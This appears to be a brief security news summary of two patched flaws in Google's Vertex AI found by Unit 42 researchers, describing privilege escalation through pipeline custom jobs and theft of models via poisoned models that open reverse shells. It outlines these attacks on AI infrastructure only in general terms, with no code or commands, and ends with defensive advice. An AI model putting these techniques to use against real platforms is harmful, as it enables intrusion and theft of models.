Critical Flaws in Google’s Vertex AI Could Let Attackers Steal Machine Learning Models

Critical Flaws in Google's Vertex AI Could Let Attackers Steal Machine Learning Models

Security Vulnerabilities Found in Google’s Vertex AI Platform

Palo Alto Networks Unit 42 researchers have discovered two significant security flaws in Google’s Vertex AI machine learning platform:

1. Privilege Escalation Vulnerability:

– Exploits Vertex AI Pipelines feature through custom jobs

– Allows unauthorized access to restricted resources

– Enables attackers to create backdoor access using reverse shells

– Permits access to internal Google Cloud repositories

2. Model Exfiltration Vulnerability:

– Involves deploying poisoned models to create reverse shells

– Enables unauthorized access to Kubernetes clusters

– Allows extraction of sensitive ML models and fine-tuned LLMs

– Could compromise entire AI environments through a single malicious model

Impact and Resolution:

– Both vulnerabilities have been patched by Google

– Potential for serious data breaches and intellectual property theft

– Organizations advised to implement strict model deployment controls

– Regular permission audits recommended

Share This Article